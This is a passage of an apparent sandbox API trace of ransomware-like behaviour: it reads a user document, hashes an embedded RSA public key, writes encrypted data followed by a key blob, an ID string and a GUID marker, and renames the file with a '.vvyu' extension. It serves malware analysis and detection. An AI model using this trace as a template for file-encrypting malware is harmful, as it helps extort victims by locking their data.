dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.942] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x8d60, lpOverlapped=0x0) returned 1 [0184.943] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.943] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.943] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.943] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.944] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.944] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.944] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.944] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.944] GetLastError () returned 0x0 [0184.944] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.944] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.945] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.945] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.945] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8d60) returned 0x2d43778 [0184.945] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d386d0 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38718 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.946] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0184.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0184.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea80 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4ea68 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.949] GetCurrentThreadId () returned 0x264 [0184.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d371c8 [0184.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.949] GetCurrentThreadId () returned 0x264 [0184.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82bc0 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0184.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0184.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea80 [0184.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0184.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0184.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eab0 [0184.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0184.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eaf8 [0184.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea98 [0184.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0184.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea68 [0184.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0184.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0184.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0184.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0184.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0184.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0184.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0184.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0184.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0184.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38718 | out: hHeap=0x6a0000) returned 1 [0184.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0184.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.961] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x8d5b, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x8d5b, lpOverlapped=0x0) returned 1 [0184.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.962] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x8d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.962] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0184.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0184.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0184.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0184.964] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0184.964] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.964] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.964] CloseHandle (hObject=0x584) returned 1 [0184.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0184.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0184.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0184.966] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\r92E9U.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\r92e9u.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\r92E9U.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\r92e9u.docx.vvyu")) returned 1 [0184.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.968] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0184.970] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, 